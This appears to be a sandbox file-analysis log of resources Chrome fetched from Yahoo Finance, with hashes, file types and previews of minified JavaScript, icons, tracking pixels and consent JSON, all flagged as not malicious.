                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 11V3h-8l3.29 3.29-10 10L3 13v8h8l-3.29-3.29 10-10z"/></svg>';export{s as E};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (1904)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.164653390661849
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Tf7QAaqTV3qjsNVN6Q7F9PoeWjCQ8PeZlvn:TV/xcMNR9POZZlvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F3C6FAA96CF15803D54C2BDC49D5CC59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CAC6824BF3CF20E13357B465FE9D4045D63B0BCE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A74EB356648AB462BA0806A1BA955E7834C6750CE498B650D9F8C4CAFFFEA9E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9962708C72A01389DAB4C77A4EE97A9DB0A7F63B5F3442655304BBD735C4AF91992D2255B1025D01AA5337E2242EB242DFF6CA91993A93A350ED53D0C2062B48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/StoryMetaPublishing.C_n46Tbl.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as S,p as h,k as u,n as b,i as d,e as k,b as p,t as v,d as N,f as q,j as D,h as P,q as y,L as o,l as _,m as C,Y as I}from"./scheduler.Dsuh-FKt.js";import{S as g,i as j}from"./index.CvwOawEI.js";function r(n){let e,i,t=(n[0]||"")+"",f,l=!n[3]&&m(n);return{c(){e=k("div"),l&&l.c(),i=p(),f=v(t),this.h()},l(s){e=N(s,"DIV",{class:!0});var a=q(e);l&&l.l(a),i=D(a),f=P(a,t),a.forEach(d),this.h()},h(){y(e,"class","publishing yf-1weyqlp"),o(e,"bolded",n[2])},m(s,a){u(s,e,a),l&&l.m(e,null),_(e,i),_(e,f)},p(s,a){s[3]?l&&(l.d(1),l=null):l?l.p(s,a):(l=m(s),l.c(),l.m(e,i)),a&1&&t!==(t=(s[0]||"")+"")&&C(f,t),a&4&&o(e,"bolded",s[2])},d(s){s&&d(e),l&&l.d()}}}function m(n){let e=(n[1]||"")+"",i,t,f,l=n[1]&&n[0]&&c();return{c(){i=v(e),t=p(),l&&l.c(),f=h()},l(s){i=P(s,e),t=D(s),l&&l.l(s),f=h()},m(s,a){u(s,i,a),u(s,t,a),l&&l.m(s,a),u(s,f,a)},p(s,a){a&2&&e!==(e=(s[1]||"")+"")&&C(i,e),s[1]&&s[0]?l||(l=c(),l.c(),l.m(f.parentNode,f)):l&&(l.d(1),l=null)},d(s){s&&(d(i),d(t),d(f)),l&&l.d(s)}}}function c(n)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 12 x 12, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.862340972505271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:6v/lhPbnUgnPV/81FnNN+naMwy9CG5s/O65IP20OGtWJPjQVXV8up:6v/7Tvn9oFQaMTCG5sWhP20OGtOPcd2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DFA7B52C86E56BD67FA4002F6ED19854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7DF722645482433C2B5C8D8AB4272A9874592F27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F68019EB4B4E5933301D4EE75969E0CB94ED8333BF514630FA749EB9C3E483C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:562D75C4540B7EBFE43FF28A4134C813E7E1BD1562F1E722FA62193E1315D4D2800150E0E3680F09BEDF004B96D6B22BF63AF8B32589CF469663BEDB4C59EE5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............|.l....IDAT.W=.1R.P.....J.'J.%....p...(.i@....p.1..E..|.x..cBL .3.. ...,((X...0J.{.....;..#.O.U....K..f..1...A=.K...s....n...`....w+.-k.. ..=..?./sYp...Vmn..f....f..yr..AT.g...,..;...@........}.S.......IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.115380967449577
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:qCIsqDmJS4RKb5ykKcvXjXRHoNcHn6KFAdSHF/F3Ywn:qT9mc4sl3O4n44V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C10F0464F42663F554C90A9AD440DC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FFDEDE5CEA1423B9888D3C0CE22DAE8376212E94
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7E8C739C142D8934EA6C14482828E9D6C02C79CC3550D89D1381614216E1E6B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9E5223C932ABBE382F5F8752E7C0AD7A4230F4DA0DB67F19625C3E092CCD26C752F514798AAAE82400CA9D8E2DBC2A25449A150F29B54085F0F43260A1A846BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/remove.Cs4fefIn.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const o='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 13H5v-2h14z"/></svg>';export{o as R};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8487), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.270730672534649
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:VgHvGB2mC2xiP2TwQG06pvmeHn1IUNsKOcVqAAYyojkb4liN6vD3:GHOB2mC2xjz6pvmgoFkymkUi2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:36FE94E917E5DC731081CE2ED65A7CA7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5F38CFC9B769D4E019EF9234829AAEAEAD4366B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E30B827CDEFDCC2FF2E3FB69D1D0B30E7A9E679B18A2385B3C85FF345FDDBB46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4816F9EFBFD5C41679A1CC22CBC7828F65AF95866FF67BD063807E8A699C58CC8AA74301A24FE05CADA0970234244A68048AA85C58D56D77A3965092FE8EBB7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://opus.analytics.yahoo.com/tag/opus.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var n=function(n){if(n)return n;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(n){return""}};const t=function(n,t){for(var e="".concat(n,"="),o=(t||window.document).cookie.split(";"),a=0;a<o.length;a++){var i=(o[a]||"").trim();if(0===i.indexOf(e))return i.substring(e.length,i.length)}return""},e=function(t,e,o,a){(a||window.document).cookie="".concat(t,"=").concat(e,";Max-Age=").concat(31536e3,";Domain=").concat(n(o),";path=/;Secure;SameSite=None")},o=function(t,e,o){(o||window.document).cookie="".concat(t,"=;Max-Age=0;Domain=").concat(n(e),";path=/;Secure;SameSite=None")},a=function(n,t,e){try{var o=(e||window.localStorage).getItem(n);return t?JSON.parse(o):o}catch(n){return null}},i=function(n,t,e,o){try{e?(o||window.localStorage).setItem(n,JSON.stringify(t)):(o||window.localStorage).setItem(n,t)}catch(n){}},c=function(n,t){try{(t||window.localStorage).removeItem(n)}catch(n){}};var r="opus",d=function(n){for(var t=0,e=0;e<n.length;e++
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13778), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2842901333678345
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:/JwTpCNwszoTDPohnGZA3exQUqxL/wwBVi:elCNw/XoR4A3eePbi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4443A60B3D3645610C9E65B7CC9F15BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DE3A0B8509362B37FB40D74A9883F366D161A8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F271BF73D0EEFE04F56CB6390E07D7D2A4794787283D65221397B258CEF040DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6134E0CE99CC2128F03FF38713B7A88617EA9C1518F01C6D56CD725673C0F58B58572E4744C6254868D98BE8EF9AF352BA0B724290EB35D182AA5F57381048B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-action-1.8.1-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-action",[],e):"object"==typeof exports?exports["wafer-action"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-action"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(a){if(r[a])return r[a].exports;var i=r[a]={i:a,l:!1,exports:{}};return t[a].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var r={};return e.m=t,e.c=r,e.d=function(t,r,a){e.o(t,r)||Object.defineProperty(t,r,{configurable:!1,enumerable:!0,get:a})},e.n=function(t){var r=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(r,"a",r),r},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,r){"use strict";function a(t,e,r){return e in t?Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2219)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.385370496130433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:N2xW2fYD/ZZzQGWrh8+r7KdqOg9KmSvJUqEj8JUqEZYs:C8rZZzlIh8u7Kd+8LUqEWUqEZYs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EEB41E47854A1AA0DB1C56E01F44BCD0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DF0B6A5BD13841DAECFD8A5EC9774B419D26ED6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:46C033C47D063561B921C33DF62EF1ADBE97B92BCFF786D91C2D0DB65DA6FA8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5D990801B3F88C99AF6278B83154E0D4461686F074D58A9D5FA6C786C471C7ABBE2E96D1B5047A2E304EDB94C4DC073AE8B4837C7D9BBCB8F8618F9936690126
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{a9 as b}from"./commonUtil.BWwawKjd.js";var a={},p={};/*!. * cookie. * Copyright(c) 2012-2014 Roman Shtylman. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */p.parse=T;p.serialize=O;var F=decodeURIComponent,A=encodeURIComponent,h=/; */,v=/^[\u0009\u0020-\u007e\u0080-\u00ff]+$/;function T(e,n){if(typeof e!="string")throw new TypeError("argument str must be a string");for(var r={},o=n||{},t=e.split(h),s=o.decode||F,i=0;i<t.length;i++){var f=t[i],l=f.indexOf("=");if(!(l<0)){var d=f.substr(0,l).trim(),c=f.substr(++l,f.length).trim();c[0]=='"'&&(c=c.slice(1,-1)),r[d]==null&&(r[d]=U(c,s))}}return r}function O(e,n,r){var o=r||{},t=o.encode||A;if(!v.test(e))throw new TypeError("argument name is invalid");var s=t(n);if(s&&!v.test(s))throw new TypeError("argument val is invalid");var i=e+"="+s;if(o.maxAge!=null){var f=o.maxAge-0;if(isNaN(f))throw new Error("maxAge should be a Number");i+="; Max-Age="+Math.floor(f)}if(o.domain){if(!v.test(o.domain))throw new TypeError("opt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.689035797843321
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YMsw/ncMHJAuwxk8HHiJsMMg/eUtfYtlm2spn/Fx2VHfCkpHC+MZt:YMsw/ntHJqPMMg/ptQoXn/Fx2t6mHqt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D46B10303ECFF8C2CCE98EC431086E2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C7A24E3C5B292CBB844CB5D43FC4B2E1FAA18294
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9B6F3685E1D9549028157658D696862CF744696EC519852D5BD4207F03E440DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:435F568252DCAEBB0609B7B0C26DD23B563BE69F97352F7F8876DF961CECEED4F8B3C3FFA94093873D830A3D3D8E89AE41048087444C3170208268E133073655
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://guce.yahoo.com/v1/consentRecord?consentTypes=iab%2CiabCCPA%2Cgpp%2CgppSid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"identifier":"b4p940tjflnfm","identifierType":"bid","tosRecords":{"nonEu":{"consentEvents":{"iabCCPA":"1YNN","gpp":"DBAA","gppSid":"-1"}}}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.934531566191737
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:0SYWFFWlIYCEnAi32GfqzJd9exKLGTDBGK+WAtgi3tMBg/MKLL3TF5KprSoVfK:0IFFEA2hizJdIKY2hSTy/MKvJ5KU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:535E28292618657545601097A3E45455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A5417195AA468111CB1E96CB5124A46AC9FE06A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E96330423A58A6C16F79019A319FB4694A0655331B984452662CEECEA3414028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E316C8B6C2298C7594D70DC7B2D442A97106B32B42E4B831F8F69048B2D9E2D97C1F147E3657787A2416021B5DDF8C9407D46AF2E7CD3960F3B274854511347F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/static/impl/css/yahoo_cr3_beta.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@font-face {. font-family: 'Yahoo CR3 Beta';. src: url('//cdn.taboola.com/static/impl/ttf/YahooCR3VARBETA-VF-YahooConfidentialInformation.ttf') format('truetype');.}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.06923567775942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHKfQZywXK0om4:YEOBeQHK0om4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8A6684396EEA6A643701D3DFDE84FB64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1B7A8BEB17FDCECBC23B629F92C98A3C684035D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:94B61DAE039338813DC95B5512B1EA7EDE3E8C128AB052303E3C2EB15FA4BA17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0A8DFE621109C853B433DD07A239FCB500EAB2DBB5E89B2D049CCE1010DE1FE632AEFA28C5F1E7F7EA4F0EF2FF574CA8B678FC891C49AEF5AA69B32A95E72100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ups.analytics.yahoo.com/ups/58831/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://dis.criteo.com/dis/usersync.aspx?r=44&p=75&cp=triplelift&cu=1&gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=&url=https%3A%2F%2Feb2.3lift.com%2Fxuid%3Fmid%3D2711%26xuid%3D%40%40CRITEO_USERID%40%40%26dongle%3D013b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (31704)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):31798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.501485060473161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:O00ifDwDjh/k3dBLhozQnYzJlaxkZliFP:LMx8tBuFNu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:15CE773B0C346DD76C37064DD2B429AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2BCB7091C7BAAD5BD800D9EF6F1ACC172A01481A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:747F560C638E2C481C9F04EBC3D80E87481466528DAC42F9907F4369C9B4BBE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3111B7C05F97FEA028C20A121A95736D84EFAE0C22FF9D1D1823406F77AFFE1A9BF66C51600C238748D472086E2D974CFA07DB3D4508B8C792C26A7748F13FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-639f5d9a.cfb3dfe0741674eba1bf.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[7592],{1216:(t,i,e)=>{var r,s,n=e(4603);e(1235),e(8978);function h(){}h[15315]=function(){for(var t=2;9!==t;)switch(t){case 2:t="object"==typeof globalThis?1:5;break;case 1:return globalThis;case 5:var i;try{for(var e=2;6!==e;)switch(e){case 9:delete i.cuP2g,delete Object.prototype.vlw7I,e=6;break;case 3:throw"";case 4:e="undefined"==typeof cuP2g?3:9;break;case 2:Object.defineProperty(Object.prototype,"vlw7I",{get:function(){return this},configurable:!0}),(i=vlw7I).cuP2g=i,e=4}}catch(r){i=window}return i}}(),function(t){function i(t){for(;;){return[arguments][0][0]}}for(var e=2;81!==e;)switch(e){case 86:r(o,"push",s[80],s[23]),e=85;break;case 26:s[76]="E",s[20]="",s[20]="",s[20]="j",s[64]="",s[64]="S3l",s[95]="s",e=34;break;case 50:s[55]=s[25],s[55]+=s[69],s[55]+=s[50],s[82]=s[98],e=46;break;c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3636)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.478304456163035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:yMz5Oa9GJEKo2WOSSKfBCGcudNg41FQ6bFRtB7t5Sfd:yS51GJEhDSWAGcWQ6bFRtBOfd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F81285961AD5D03C2217D9416BE8044A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2083E0260F5B7DAF1538B2A01D3BBCB7500EBEF8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0E44ED73DCE73AFC5DAF11E91DC1967625DC25BD5AD483412F21EAD57AB06FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:338D583A530076B05E7F05663136CFA9412595BC577CBA3A52C51AC0EC3941929A50897065D6532EF0F2DE766F7F34E6EC360264F1CD808D4F3E146004A097CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as j,p as T,k as I,i as g,o as P,e as K,d as L,f as q,q as _,O as z,l as O,R,n as B}from"./scheduler.Dsuh-FKt.js";import{S as G,i as H,g as J,a as h,e as Q,t as S,c as W,b as x,m as V,j as U,d as v}from"./index.CvwOawEI.js";import{g as A,e as X}from"./commonUtil.BWwawKjd.js";import{F as Y}from"./FilteredStories.BZDUwXYM.js";import{S as Z}from"./Spinner.D9ew0_W4.js";import{f as p}from"./index.CwoOB1cS.js";import{l as $}from"./loadNewsStream.DpYg868c.js";function ee(l){let e,t,i,m,f,s;return i=new Y({props:{stream:l[6],i13nModel:{sec:"qsp-news",...l[0]},variant:"stream",maxStoryCount:l[2],infiniteScroll:!0,infiniteScrollThreshold:l[7]?850:450,onLoadMore:l[10],imageKey:l[3],size:"x-large",storyItemProps:{maxTickers:l[5]}}}),{c(){e=K("div"),t=K("div"),W(i.$$.fragment),this.h()},l(r){e=L(r,"DIV",{class:!0,"data-testid":!0});var a=q(e);t=L(a,"DIV",{class:!0});var o=q(t);x(i.$$.fragment,o),o.forEach(g),a.forEach(g),this.h()},h(){_(t,"class","holder yf-17l7f4i"),_(e,"class",f=z(`news-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30186)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):32700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.489965733482254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:rsHz9jdA0KZbptvzF+D1+anaTNG3Bpqp2pnZNX6pJpvKHi6vp8BMoV3QMg4pd6h5:onKanaiNoVg5
